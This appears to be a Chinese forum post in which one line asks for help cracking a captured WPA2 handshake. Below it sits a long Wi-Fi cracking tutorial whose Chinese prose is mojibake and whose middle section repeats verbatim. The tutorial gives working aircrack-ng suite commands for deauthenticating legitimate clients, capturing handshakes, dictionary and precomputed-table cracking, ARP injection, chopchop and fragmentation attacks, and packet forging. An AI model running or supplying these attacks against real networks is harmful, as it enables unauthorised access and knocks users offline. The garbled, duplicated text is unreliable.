从无线论坛上看了一些教程,学会了抓握手包,可是刚刚抓到WPA2的握手包,自带的字典的却破解不了,求教高手帮忙破解一下。
WPAç ´è§£è¯¦ç»æç¨
ç ´è§£ WPA çåæï¼å¿ é¡»è¦æåæ³æ 线客æ·ç«¯
WPA ç ´è§£çåçï¼
å©ç¨Deauthéªè¯æ»å»ãä¹å°±æ¯è¯´å¼ºå¶è®©åæ³æ 线客æ·ç«¯ä¸AP被æå¼ï¼å½å®è¢«ä»WLAN ä¸æå¼åï¼è¿ä¸ªæ 线
客æ·ç«¯ä¼èªå¨å°è¯éæ°è¿æ¥å°APä¸ï¼å¨è¿ä¸ªéæ°è¿æ¥è¿ç¨ä¸ï¼æ°æ®é信就产çäºï¼ç¶åå©ç¨airodumpæè·
ä¸ä¸ªæ 线路ç±å¨ä¸æ 线客æ·ç«¯å次æ¡æçè¿ç¨ï¼çæä¸ä¸ªå å«å次æ¡æçcapå ãç¶ååå©ç¨åå ¸è¿è¡æ´å
ç ´è§£ã
1ï¼ æ¿æ´»ç½å¡ï¼å¹¶è®©å ¶å·¥ä½äº11ä¿¡é
Airmon-ng start wifi0 11
2ï¼æè·11ä¿¡éçcapå ï¼å¹¶ä¿åcapå 为123.cap
Airodump-ng âw 123 âc 11 wifi0
ä¸å¾å¯ä»¥çåºéç¨äºWPAå å¯æ¹å¼ï¼å¹¶ä¸æä¸ä¸ª0016b69d10adåæ³çæ 线客æ·ç«¯ã
3. è¿è¡Deauthéªè¯æ»å»ï¼å¼ºå¶æå¼åæ³æ 线客æ·ç«¯åAPç´æ¥çè¿æ¥ï¼ä½¿å ¶éæ°è¿è¡è¿æ¥
aireplay-ng -0 10 -a <ap mac> -c <my mac> wifi0
解éï¼-0æçæ¯éåDeautenticateæ»å»æ¹å¼ï¼åé¢ä¸ºåé次æ°ã-c建议è¿æ¯ä½¿ç¨ï¼ææä¼æ´å¥½ï¼è¿ä¸ªåé¢è·
çæ¯çæµå°çåæ³çå·²è¿æ¥ç客æ·ç«¯MACå°å
注æä¸å¾çº¢è²é¨åï¼-cåé¢ä¸ºåæ³æ 线客æ·ç«¯çMACå°å
Deauthæ»å»å¾å¾å¹¶ä¸æ¯ä¸æ¬¡æ»å»å°±æåï¼ä¸ºç¡®ä¿æåæªè·éè¦åå¤è¿è¡ï¼WPAç ´è§£ä¸ç¨çå°æ°æ®Dataè¾¾å°
å ä¸ï¼å 为å®åªè¦ä¸ä¸ªå å«WPA4次æ¡æéªè¯å å°±å¯ä»¥äºï¼ãå¦ææåæè·ä¼åºç°ä¸å¾çº¢è²é¨åçæ示
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 25
è¿æ¶å¦æè¾å ¥dirå°±å¯ä»¥å¨rootç®å½ä¸çå°å为123.capçæ¡æå äºã
å¾å°æ¡æå 以åå°±å¯ä»¥ç¨åå ¸ç´æ¥ç ´è§£
é¦å å°å¨windowsä¸ç¨åå ¸å·¥å ·çæçåå ¸ï¼ä¾password.txtï¼æ·è´å°rootç®å½ä¸
å¨BT3æ¡é¢åå»systemç¶ååºç°ä¸å¾ã
å¾ä¸å·¦è¾¹çº¢è²å°±ä¸ºrootç®å½ï¼å¾ä¸çº¢è²åå¨ä»è´¨åå»æå¼ä»¥åå°±çå°ä½ çæ¯ä¸ªç¡¬ççååºäºãå¯ä»¥è¿å ¥ç¡¬
çååºå³é®æ·è´ï¼ç¶åè¿å ¥rootç®å½å³é®ç²è´´ãå¦ä¸å¾çº¢è²é¨å
ç®åWPA çç ´è§£ä¸»è¦è¿æ¯åºäºæ´åç ´è§£ååå ¸ç ´è§£ï¼æ´åç ´è§£ååå ¸ç ´è§£çä¸ä¸ªå ±æ§å°±æ¯âèæ¶ãè´¹åã
è¿æ°âæ以å¾å¾ææ¶åä½ è±äºå¾å¤æ¶é´ä½è¿æ¯ç ´ä¸äºï¼è¿æ¶åå¸æ大家è¿æ¯è¦æ¥åè¿æ ·ä¸ä¸ªæ®é ·çç°å®ã
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 26
ç ´è§£æ¹å¼ä¸ï¼ç¨Capæ°æ®å ç´æ¥æ´åç ´è§£
ä»ç ´è§£é¾åº¦ä¸è®²WEP æ¯å¾å®¹æç ´è§£çï¼åªè¦ä½ æ¶é足å¤çCap æ°æ®å å°±è¯å®å¯ä»¥ç ´è§£ãWPA çç ´è§£éè¦
æ好çå¯ç åå ¸é åæè½å®æï¼å¤æçWPAå¯ç å¯è½å 个æä¹ç ´è§£ä¸åºæ¥ã
è¾å ¥ï¼aircrack-ng -z âb <ap mac> 123*.cap
123 æ¯åé¢æè·å¾çæ¡æå çæ件åãç³»ç»ä¼èªå¨å¨ä½ è¾å ¥çæ件ååå ä¸-01ã-02ï¼å¦ææ°æ®å 太å¤ï¼ç³»
ç»ä¼èªå¨åæå 个æ件åå¨å¹¶èªå¨å½åï¼å¯ä»¥ä½¿ç¨lsæ¥çï¼ï¼è¾å ¥123*æ¯æå¼ææ123ç¸å ³çcapæ件ã
常è§é®é¢ï¼æ¥éª¤2ä¸æ¶éæ°æ®å 已达30Wï¼æ æ³ç ´è§£å¯ç ãå¯è½ç³»ç»èªå¨åæäºå 个æ件贮åcapå ã
å¦è¾å ¥123-01.capç ´è§£å¯è½å¯¼è´ç ´è§£ä¸æåï¼å»ºè®®ä½¿ç¨123*.capéæ©ææçcapå è¿è¡ç ´è§£ã
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 27
ç ´è§£æ¹å¼äº. æåå ¸ç ´è§£
ä¸ï¼ç´æ¥å¨BT3ä¸æåå ¸ç ´è§£
aircrack-ng âw password.txt âb <ap mac> 123.cap
åæ°è¯´æï¼passwrod.txt为åå ¸å称123.cap为æ¥éª¤2ä¸è·å¾çæ¡æä¿¡æ¯å
èæ¶1å31ç§è·å¾WPAå¯ç ï¼å¦ä¸å¾
ä»ä¸å¾å¯ä»¥çåºç ´è§£ç¨æ¶1å31ç§ï¼é度149.91K/S
注ï¼æ¬æç¨åªä¸ºäºæè¿°ç ´è§£çè¿ç¨ãææ¯åäºä¸ª256Kçå°åå ¸ï¼äºå æå¯ç å·²ç»å å°åå ¸éäºã
äºï¼ä¹å¯ä»¥æå å«4次æ¡æçCAPæ°æ®å æ·è´å°ç¡¬çä¸å¨WINä¸ç¨WinAircrackæåå ¸ç ´è§£ã
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 28
å¦ä¸å¾ Encryption typeå¤éæ©WPA-PSKï¼ä¸é¢capture fileså¤å¯¼å ¥æåçæ¡æå 123.cap
ç¶åéæ©WPAé项ï¼å¦ä¸å¾
å¨ä¸å¾ä¸Dictionary fileå¤å¯¼å ¥åå ¸æ件password.txtãç¶åç¹å»å³ä¸è§çAircrack the key
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 29
ç¶ååºç°ä¸å¾æ示
ä¸å¾ï¼éæ©1åå车ï¼ç¶åå¼å§ç ´è§£ãæåç ´è§£å¦ä¸å¾
ä»ä¸å¾å¯ä»¥çåºç ´è§£ç¨æ¶54ç§ï¼é度251.73K/S(æ¯BT3ä¸è¦å¿«)
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 30
ä¸ï¼éè¿airolibæ建WPA tableå®ç°WPA线éç ´è§£
WPAçåå ¸ç ´è§£é¤äºç´æ¥æåå ¸ç ´è§£å¤ï¼å¦å¤ä¸ç§å°±æ¯ç¨airolibå°åå ¸æé æWPA tableç¶ååç¨aircrac
è¿è¡ç ´è§£ã
æ建WPA tableå°±æ¯éç¨åWPAå å¯éç¨åæ ·ç®æ³è®¡ç®åçæçHash æ£åæ°å¼ï¼è¿æ ·å¨éè¦ç ´è§£çæ¶åç´
æ¥è°ç¨è¿æ ·çæ件è¿è¡æ¯å¯¹ï¼ç ´è§£æçå°±å¯ä»¥å¤§å¹ æé«ã
å 讲éè¿airolibæ建WPA table
WPA tableå ·æè¾å¼ºçé对ssidçç¹æ§ã
1. å¨æ建WPA tableä¹åéè¦åå¤ä¸¤ä¸ªæ件ï¼ä¸ä¸ªæ¯ssidå表çæ件ssid.txtï¼ä¸ä¸ªæ¯åå ¸æ件
password.txtãä¸å¾ä¸ºæçæ件
大家å¯ä»¥çå°ä¸¤ä¸ªtxtçæ件ï¼ssidè®°äºæ¬éæ¯ssidçå表ï¼ä½ å¯ä»¥å¢å 常è§çssidè¿å»ï¼åé¢çpasswrod
å°±æ¯åå ¸æ件äºã
2. æè¿ssid.txtåpassword.txtè¿æä¸é¢æå°çæ¡æå 123.capè¿ä¸ä¸ªæ件æ·è´å°rootç®å½ä¸æ¹ä¾¿ä½¿ç¨ã
è§ä¸å¾
3.å¼å§å©ç¨airolib-ngæ¥æ建WPA tableäºãæ建wpa tableä¿åçåå为wpahashï¼ä¸åï¼
第ä¸æ¥ï¼å¦ä¸å¾
airolib-ng wpa --import essid ssid.txt
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 31
第äºæ¥ï¼å¦ä¸å¾
airolib-ng wpa --import passwd password.txt
第ä¸æ¥ï¼å¦ä¸å¾
airolib-ng wpa --clean all
第åæ¥ï¼å¦ä¸å¾
airolib-ng wpa --batch
注ï¼è¿ä¸æ¥è¦çå¾ä¹ ï¼è§åå ¸å¤§å°èå®ï¼æ256Kçåå ¸çäºæ15åéï¼
4. ç¨aircrackæ¥å©ç¨WPA tableè¿è¡ç ´è§£
Aircrack-ng âr wpahash 123.cap
éæ©1以åå°å¼å§ç ´è§£ã
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 32
æåç ´è§£å°å¦ä¸å¾æ示
ä»ä¸å¾ä¸å¯ä»¥çåºèæ¶00:00:00åæ£ä¸è¶ è¿1ç§éï¼é度42250.00K/S
大家ä¹çå°äºä¸ç§ç ´è§£æ¹å¼ï¼ç´æ¥æåå ¸ä¸å¨winä¸ç¨WinAircrackç ´è§£æ¯é度æ¯å¨BT3ä¸è¦å¿«ãç´æ¥æåå ¸
ç ´è§£ä¸è¶ è¿1åéå°±ç ´åºäºå¯ç ï¼å©ç¨WPA tableç ´è§£é度è½ç¶ä¸å°ä¸ç§ï¼ä½æ¯æ建WPA tableå´èè´¹äº15å
éãæ建WPA tableæ¯å¾èæ¶çï¼ä½æ¯æ建åºäºå æ¬å¸¸è§ssidçåç¸å¯¹è¾å¤§åå ¸çWPA tableçè¯ï¼ä»¥åç ´
解çé度å°å¤§å¤§éä½ãå½ç¶æ²¡æä¸è½çåå ¸ï¼å¦ææä¸è½çåå ¸ï¼åæ建åºä¸ä¸ªå¸¸è§ssidçWPA tableçè¯
é£è¿ä¸ªé¢è¿ç®æ°æ®åºæ¯è¶ çº§è¶ çº§åºå¤§çã
注ï¼WINå¹³å°ä¸çCAIN软件ä¸çç ´è§£å¨ä¹å¯ç¨äºWEPåWPAçåºäºæ´åååå ¸çç ´è§£ï¼ä½æ¯å ¶ç ´è§£é度å¾æ ¢ï¼
ç¸æ¯aircrack-ngèè¨ä¸å ·å®ç¨ä»·å¼ã
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 33
Aireplay-ngç6ç§æ»å»æ¨¡å¼è¯¦è§£
-0 Deautenticate å²çªæ¨¡å¼
使已ç»è¿æ¥çåæ³å®¢æ·ç«¯å¼ºå¶æå¼ä¸è·¯ç±ç«¯çè¿æ¥ï¼ä½¿å ¶éæ°è¿æ¥ãå¨éæ°è¿æ¥è¿ç¨ä¸è·å¾éªè¯æ°æ®å ï¼
ä»è产çææARP requestã
å¦æä¸ä¸ªå®¢æ·ç«¯è¿å¨è·¯ç±ç«¯ä¸ï¼ä½æ¯æ²¡æ人ä¸ç½ä»¥äº§çæææ°æ®ï¼æ¤æ¶ï¼å³ä½¿ç¨-3 ä¹æ æ³äº§çææARP
requestãæ以æ¤æ¶éè¦ç¨-0 æ»å»æ¨¡å¼é åï¼-3 æ»å»æä¼è¢«ç«å»æ¿æ´»ã
aireplay-ng -0 10 âa <ap mac> -c <my mac> wifi0
åæ°è¯´æï¼
ã-0ãï¼å²çªæ»å»æ¨¡å¼ï¼åé¢è·åé次æ°ï¼è®¾ç½®ä¸º0ï¼å为循ç¯æ»å»ï¼ä¸åçæå¼è¿æ¥ï¼å®¢æ·ç«¯æ æ³æ£å¸¸ä¸
ç½ï¼
ã-aãï¼è®¾ç½®apçmac
ã-cãï¼è®¾ç½®å·²è¿æ¥çåæ³å®¢æ·ç«¯çmacãå¦æä¸è®¾ç½®-cï¼åæå¼ææåapè¿æ¥çåæ³å®¢æ·ç«¯ã
aireplay-ng -3 -b <ap mac> -h <my mac> wifi0
注ï¼ä½¿ç¨æ¤æ»å»æ¨¡å¼çåææ¯å¿ é¡»æéè¿è®¤è¯çåæ³ç客æ·ç«¯è¿æ¥å°è·¯ç±å¨
-1 fakeauth count ä¼ªè£ å®¢æ·ç«¯è¿æ¥
è¿ç§æ¨¡å¼æ¯ä¼ªè£ ä¸ä¸ªå®¢æ·ç«¯åAPè¿è¡è¿æ¥ã
è¿æ¥æ¯æ 客æ·ç«¯çç ´è§£ç第ä¸æ¥ï¼å 为æ¯æ åæ³è¿æ¥ç客æ·ç«¯ï¼å æ¤éè¦ä¸ä¸ªä¼ªè£ 客æ·ç«¯æ¥åè·¯ç±å¨ç¸è¿ã
为让APæ¥åæ°æ®å ï¼å¿ 须使èªå·±çç½å¡åAPå ³èãå¦æ没æå ³èçè¯ï¼ç®æ APå°å¿½ç¥ææä»ä½ ç½å¡å
éçæ°æ®å ï¼IVS æ°æ®å°ä¸ä¼äº§çãç¨-1 ä¼ªè£ å®¢æ·ç«¯æåè¿æ¥ä»¥åæè½åéæ³¨å ¥å½ä»¤ï¼è®©è·¯ç±å¨æ¥åå°æ³¨
å ¥å½ä»¤åæå¯åé¦æ°æ®ä»è产çARPå ã
aireplay-ng -1 0 âe <ap essid> -a <ap mac> -h <my mac> wifi0
åæ°è¯´æï¼
ã-1ãï¼ä¼ªè£ 客æ·ç«¯è¿æ¥æ¨¡å¼ï¼åé¢è·å»¶æ¶
ã-eãï¼è®¾ç½®apçessid
ã-aãï¼è®¾ç½®apçmac
ã-hãï¼è®¾ç½®ä¼ªè£ 客æ·ç«¯çç½å¡MACï¼å³èªå·±ç½å¡macï¼
-2 Interactive 交äºæ¨¡å¼
è¿ç§æ»å»æ¨¡å¼æ¯ä¸ä¸ªæå åææ°æ®åæ»å»å ï¼ä¸ç§éåä¸èµ·ç模å¼
1ï¼è¿ç§æ¨¡å¼ä¸»è¦ç¨äºç ´è§£æ 客æ·ç«¯ï¼å ç¨-1建ç«èå客æ·ç«¯è¿æ¥ç¶åç´æ¥åå æ»å»
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
åæ°è¯´æï¼
ã-2ãï¼äº¤äºæ»å»æ¨¡å¼
ã-pã设置æ§å¶å¸§ä¸å å«çä¿¡æ¯ï¼16è¿å¶ï¼ï¼é»è®¤éç¨0841
ã-cã设置ç®æ macå°å
ã-bã设置apçmacå°å
ã-hãè®¾ç½®ä¼ªè£ å®¢æ·ç«¯çç½å¡MACï¼å³èªå·±ç½å¡macï¼
2ï¼æåå ï¼åéæ³¨å ¥æ°æ®å
aireplay-ng -2 âr <file> -x 1024 wifi0
åå æ»å».å ¶ä¸ï¼-x 1024 æ¯éå®åå é度ï¼é¿å ç½å¡æ»æºï¼å¯ä»¥éæ©1024ã
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 34
-3 ARP-request æ³¨å ¥æ»å»æ¨¡å¼
è¿ç§æ¨¡å¼æ¯ä¸ç§æå ååæéåçè¿ç¨
è¿ç§æ»å»æ¨¡å¼å¾ææãæ¢å¯ä»¥å©ç¨åæ³å®¢æ·ç«¯ï¼ä¹å¯ä»¥é å-1 å©ç¨èæè¿æ¥çä¼ªè£ å®¢æ·ç«¯ãå¦ææåæ³å®¢
æ·ç«¯é£ä¸è¬éè¦çå åéï¼è®©åæ³å®¢æ·ç«¯åap ä¹é´éä¿¡ï¼å°éæ°æ®å°±å¯äº§çææARP request æå¯å©ç¨-3
模å¼æ³¨å ¥æåãå¦æ没æä»»ä½éä¿¡åå¨ï¼ä¸è½å¾å°ARP request.ï¼åè¿ç§æ»å»å°±ä¼å¤±è´¥ãå¦æåæ³å®¢æ·ç«¯å
apä¹é´é¿æ¶é´å 没æARP requestï¼å¯ä»¥å°è¯åæ¶ä½¿ç¨-0 æ»å»ã
å¦æ没æåæ³å®¢æ·ç«¯ï¼åå¯ä»¥å©ç¨-1 建ç«èæè¿æ¥çä¼ªè£ å®¢æ·ç«¯ï¼è¿æ¥è¿ç¨ä¸è·å¾éªè¯æ°æ®å ï¼ä»è产ç
ææARP requestãåéè¿-3 模å¼æ³¨å ¥ã
aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
åæ°è¯´æï¼
ã-3ãï¼arpæ³¨å ¥æ»å»æ¨¡å¼
ã-bãï¼è®¾ç½®apçmac
ã-hãï¼è®¾ç½®
ã-xãï¼å®ä¹æ¯ç§åéæ°æ®æ·å çæ°éï¼ä½æ¯æé«ä¸è¶ è¿1024ï¼å»ºè®®ä½¿ç¨512ï¼ä¹å¯ä¸å®ä¹ï¼
-4 Chopchop æ»å»æ¨¡å¼ï¼ç¨ä»¥è·å¾ä¸ä¸ªå å«å¯é¥æ°æ®çxor æ件
è¿ç§æ¨¡å¼ä¸»è¦æ¯è·å¾ä¸ä¸ªå¯å©ç¨å å«å¯é¥æ°æ®çxor æ件ï¼ä¸è½ç¨æ¥è§£å¯æ°æ®å ãèæ¯ç¨å®æ¥äº§çä¸ä¸ªæ°
çæ°æ®å 以便æ们å¯ä»¥è¿è¡æ³¨å ¥ã
aireplay-ng -4 -b <ap mac> -h <my mac> wifi0
åæ°è¯´æï¼
-bï¼è®¾ç½®éè¦ç ´è§£çAPçmac
-hï¼è®¾ç½®èæä¼ªè£ è¿æ¥çmacï¼å³èªå·±ç½å¡çmacï¼
-5 fragment ç¢çå æ»å»æ¨¡å¼ç¨ä»¥è·å¾PRGA(å å«å¯é¥çåç¼ä¸ºxor çæ件)
è¿ç§æ¨¡å¼ä¸»è¦æ¯è·å¾ä¸ä¸ªå¯å©ç¨PRGAï¼è¿éçPRGA 并ä¸æ¯wep keyæ°æ®ï¼ä¸è½ç¨æ¥è§£å¯æ°æ®å ãèæ¯
ç¨å®æ¥äº§çä¸ä¸ªæ°çæ°æ®å 以便æ们å¯ä»¥è¿è¡æ³¨å ¥ãå ¶å·¥ä½åçå°±æ¯ä½¿ç®æ APéæ°å¹¿æå ï¼å½APé广æ
æ¶ï¼ä¸ä¸ªæ°çIVSå°äº§çï¼æ们就æ¯å©ç¨è¿ä¸ªæ¥ç ´è§£
aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
ã-5ãï¼ç¢çå æ»å»æ¨¡å¼
ã-bãï¼è®¾ç½®apçmac
ã-hãï¼è®¾ç½®èæä¼ªè£ è¿æ¥çmacï¼å³èªå·±ç½å¡çmacï¼
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 35
Packetforge-ngï¼æ°æ®å å¶é ç¨åº
Packetforge-ng <mode> <options>
Mode
ã-0ãï¼ä¼ªé ARPå
packetforge-ng -0 -a <ap mac> -h <my mac> wifi0 âk 255.255.255.255 -l 255.255.255.255
ây<.xor file> -w mrarp
åæ°è¯´æï¼
ã-0ãï¼ä¼ªè£ arpæ°æ®å
ã-aãï¼è®¾ç½®apçmac
ã-hã设置èæä¼ªè£ è¿æ¥çmacï¼å³èªå·±çmacï¼
ã-kã<ip[:port]>说æï¼è®¾ç½®ç®æ æ件IPå端å£
ã-lã<ip[:port]>说æï¼è®¾ç½®æºæ件IPå端å£
ã-yã<file>说æï¼ä»xor æ件ä¸è¯»åPRGAãåé¢è·xor çæ件åã
ã-wãè®¾ç½®ä¼ªè£ çarpå çæ件å
Aircrack-ngï¼WEP åWPA-PSK key ç ´è§£ä¸»ç¨åº
Aircrack-ng [optin] <.cap/.ivs file>
Optin
aircrack-ng -n 64 -b <ap mac> name-01.ivs
åæ°è¯´æï¼
ã-nãï¼è®¾ç½®WEP KEY é¿åº¦ï¼64/128/152/256/512ï¼
aircrack-ng -x -f 2 name-01h.cap
åæ°è¯´æï¼
ã-xãï¼è®¾ç½®ä¸ºæ´åç ´è§£æ¨¡å¼
ã-fãï¼è®¾ç½®å¤æç¨åº¦ï¼wepå¯ç 设置为1ï¼wpa å¯ç 设置为2
aircrack-ng -w password.txt ciw.cap
ã-wãï¼è®¾ç½®ä¸ºåå ¸ç ´è§£æ¨¡å¼ï¼åé¢è·åå ¸æ件ï¼ååé¢è·æ¯æ们å³æ¶ä¿åçé£ä¸ªæè·å°WPA éªè¯çæå
æ件ã
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 36
常è§é®é¢èè
é®é¢1ï¼æå¨å¯å¨bt3 çæ¶åï¼è¾å ¥startxé»å±
解çï¼å¨è¾å ¥ç¨æ·åroot åå¯ç toor 以åè¾å ¥xconf è¿æ¶ä¼é»å±ä¸ä¼ï¼ç¶ååºæ¥æ示符åè¾å ¥startx å¯è¿å ¥
winçªå£ï¼å½å®å¨ä¸è½è¿å ¥winçªå£çæ¶åä½ ä¹å¯ä»¥ç´æ¥å¨æ示符ä¸è¾å ¥åç ´è§£å½ä»¤ï¼åæ¶å¯ç¨alt+f1 æå¼
ä¸ä¸ªshellï¼alt+f2 æå¼ç¬¬äºä¸ªshellï¼alt+f3 æå¼ç¬¬ä¸ä¸ªçãå ³éçªå£ç¨PRINT SCREEN é®
é®é¢2ï¼å¨BT3ä¸æå¼kismet çæ¶åçªå£ä¸éªå°±æ²¡äºã
解çï¼é¦å å 载驱ifconfig -a rausb0 å¼å§ç½å¡çå¬:airmon-ng start rausb0ãæ¾å°/usr/local/etc/kismet.conf
æå¼æ¤æ件å¨channelsplit=trueä¸é¢å å ¥ä¸è¡source=rt2500,rausb0,monitor
æ³¨ï¼ wusb54g v4ä¸å®æ¯rt2500 ,ä¸æ¯å 载驱å¨æ¶æ¾ç¤ºçrt2570ã
3945 çå å¼å å ¥source=ipw3945,eth0,IPW3945
ç ´è§£ WPA çåæï¼å¿ é¡»è¦æåæ³æ 线客æ·ç«¯
WPA ç ´è§£çåçï¼
å©ç¨Deauthéªè¯æ»å»ãä¹å°±æ¯è¯´å¼ºå¶è®©åæ³æ 线客æ·ç«¯ä¸AP被æå¼ï¼å½å®è¢«ä»WLAN ä¸æå¼åï¼è¿ä¸ªæ 线
客æ·ç«¯ä¼èªå¨å°è¯éæ°è¿æ¥å°APä¸ï¼å¨è¿ä¸ªéæ°è¿æ¥è¿ç¨ä¸ï¼æ°æ®é信就产çäºï¼ç¶åå©ç¨airodumpæè·
ä¸ä¸ªæ 线路ç±å¨ä¸æ 线客æ·ç«¯å次æ¡æçè¿ç¨ï¼çæä¸ä¸ªå å«å次æ¡æçcapå ãç¶ååå©ç¨åå ¸è¿è¡æ´å
ç ´è§£ã
1ï¼ æ¿æ´»ç½å¡ï¼å¹¶è®©å ¶å·¥ä½äº11ä¿¡é
Airmon-ng start wifi0 11
2ï¼æè·11ä¿¡éçcapå ï¼å¹¶ä¿åcapå 为123.cap
Airodump-ng âw 123 âc 11 wifi0
ä¸å¾å¯ä»¥çåºéç¨äºWPAå å¯æ¹å¼ï¼å¹¶ä¸æä¸ä¸ª0016b69d10adåæ³çæ 线客æ·ç«¯ã
3. è¿è¡Deauthéªè¯æ»å»ï¼å¼ºå¶æå¼åæ³æ 线客æ·ç«¯åAPç´æ¥çè¿æ¥ï¼ä½¿å ¶éæ°è¿è¡è¿æ¥
aireplay-ng -0 10 -a <ap mac> -c <my mac> wifi0
解éï¼-0æçæ¯éåDeautenticateæ»å»æ¹å¼ï¼åé¢ä¸ºåé次æ°ã-c建议è¿æ¯ä½¿ç¨ï¼ææä¼æ´å¥½ï¼è¿ä¸ªåé¢è·
çæ¯çæµå°çåæ³çå·²è¿æ¥ç客æ·ç«¯MACå°å
注æä¸å¾çº¢è²é¨åï¼-cåé¢ä¸ºåæ³æ 线客æ·ç«¯çMACå°å
Deauthæ»å»å¾å¾å¹¶ä¸æ¯ä¸æ¬¡æ»å»å°±æåï¼ä¸ºç¡®ä¿æåæªè·éè¦åå¤è¿è¡ï¼WPAç ´è§£ä¸ç¨çå°æ°æ®Dataè¾¾å°
å ä¸ï¼å 为å®åªè¦ä¸ä¸ªå å«WPA4次æ¡æéªè¯å å°±å¯ä»¥äºï¼ãå¦ææåæè·ä¼åºç°ä¸å¾çº¢è²é¨åçæ示
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 25
è¿æ¶å¦æè¾å ¥dirå°±å¯ä»¥å¨rootç®å½ä¸çå°å为123.capçæ¡æå äºã
å¾å°æ¡æå 以åå°±å¯ä»¥ç¨åå ¸ç´æ¥ç ´è§£
é¦å å°å¨windowsä¸ç¨åå ¸å·¥å ·çæçåå ¸ï¼ä¾password.txtï¼æ·è´å°rootç®å½ä¸
å¨BT3æ¡é¢åå»systemç¶ååºç°ä¸å¾ã
å¾ä¸å·¦è¾¹çº¢è²å°±ä¸ºrootç®å½ï¼å¾ä¸çº¢è²åå¨ä»è´¨åå»æå¼ä»¥åå°±çå°ä½ çæ¯ä¸ªç¡¬ççååºäºãå¯ä»¥è¿å ¥ç¡¬
çååºå³é®æ·è´ï¼ç¶åè¿å ¥rootç®å½å³é®ç²è´´ãå¦ä¸å¾çº¢è²é¨å
ç®åWPA çç ´è§£ä¸»è¦è¿æ¯åºäºæ´åç ´è§£ååå ¸ç ´è§£ï¼æ´åç ´è§£ååå ¸ç ´è§£çä¸ä¸ªå ±æ§å°±æ¯âèæ¶ãè´¹åã
è¿æ°âæ以å¾å¾ææ¶åä½ è±äºå¾å¤æ¶é´ä½è¿æ¯ç ´ä¸äºï¼è¿æ¶åå¸æ大家è¿æ¯è¦æ¥åè¿æ ·ä¸ä¸ªæ®é ·çç°å®ã
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 26
ç ´è§£æ¹å¼ä¸ï¼ç¨Capæ°æ®å ç´æ¥æ´åç ´è§£
ä»ç ´è§£é¾åº¦ä¸è®²WEP æ¯å¾å®¹æç ´è§£çï¼åªè¦ä½ æ¶é足å¤çCap æ°æ®å å°±è¯å®å¯ä»¥ç ´è§£ãWPA çç ´è§£éè¦
æ好çå¯ç åå ¸é åæè½å®æï¼å¤æçWPAå¯ç å¯è½å 个æä¹ç ´è§£ä¸åºæ¥ã
è¾å ¥ï¼aircrack-ng -z âb <ap mac> 123*.cap
123 æ¯åé¢æè·å¾çæ¡æå çæ件åãç³»ç»ä¼èªå¨å¨ä½ è¾å ¥çæ件ååå ä¸-01ã-02ï¼å¦ææ°æ®å 太å¤ï¼ç³»
ç»ä¼èªå¨åæå 个æ件åå¨å¹¶èªå¨å½åï¼å¯ä»¥ä½¿ç¨lsæ¥çï¼ï¼è¾å ¥123*æ¯æå¼ææ123ç¸å ³çcapæ件ã
常è§é®é¢ï¼æ¥éª¤2ä¸æ¶éæ°æ®å 已达30Wï¼æ æ³ç ´è§£å¯ç ãå¯è½ç³»ç»èªå¨åæäºå 个æ件贮åcapå ã
å¦è¾å ¥123-01.capç ´è§£å¯è½å¯¼è´ç ´è§£ä¸æåï¼å»ºè®®ä½¿ç¨123*.capéæ©ææçcapå è¿è¡ç ´è§£ã
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 27
ç ´è§£æ¹å¼äº. æåå ¸ç ´è§£
ä¸ï¼ç´æ¥å¨BT3ä¸æåå ¸ç ´è§£
aircrack-ng âw password.txt âb <ap mac> 123.cap
åæ°è¯´æï¼passwrod.txt为åå ¸å称123.cap为æ¥éª¤2ä¸è·å¾çæ¡æä¿¡æ¯å
èæ¶1å31ç§è·å¾WPAå¯ç ï¼å¦ä¸å¾
ä»ä¸å¾å¯ä»¥çåºç ´è§£ç¨æ¶1å31ç§ï¼é度149.91K/S
注ï¼æ¬æç¨åªä¸ºäºæè¿°ç ´è§£çè¿ç¨ãææ¯åäºä¸ª256Kçå°åå ¸ï¼äºå æå¯ç å·²ç»å å°åå ¸éäºã
äºï¼ä¹å¯ä»¥æå å«4次æ¡æçCAPæ°æ®å æ·è´å°ç¡¬çä¸å¨WINä¸ç¨WinAircrackæåå ¸ç ´è§£ã
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 28
å¦ä¸å¾ Encryption typeå¤éæ©WPA-PSKï¼ä¸é¢capture fileså¤å¯¼å ¥æåçæ¡æå 123.cap
ç¶åéæ©WPAé项ï¼å¦ä¸å¾
å¨ä¸å¾ä¸Dictionary fileå¤å¯¼å ¥åå ¸æ件password.txtãç¶åç¹å»å³ä¸è§çAircrack the key
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 29
ç¶ååºç°ä¸å¾æ示
ä¸å¾ï¼éæ©1åå车ï¼ç¶åå¼å§ç ´è§£ãæåç ´è§£å¦ä¸å¾
ä»ä¸å¾å¯ä»¥çåºç ´è§£ç¨æ¶54ç§ï¼é度251.73K/S(æ¯BT3ä¸è¦å¿«)
ä¸å½æ 线论åä¸å«åºå
AnywhereWLAN!! 30
ä¸ï¼éè¿airolibæ建WPA tableå®ç°WPA线éç ´è§£
WPAçåå ¸ç ´è§£é¤äºç´æ¥æåå ¸ç ´è§£å¤ï¼å¦å¤ä¸ç§å°±æ¯ç¨airolibå°åå ¸æé æWPA tableç¶ååç¨aircrac
è¿è¡ç ´è§£ã
æ建WPA tableå°±æ¯éç¨åWPAå å¯éç¨åæ ·ç®æ³è®¡ç®åçæçHash æ£åæ°å¼ï¼è¿æ ·å¨éè¦ç ´è§£çæ¶åç´
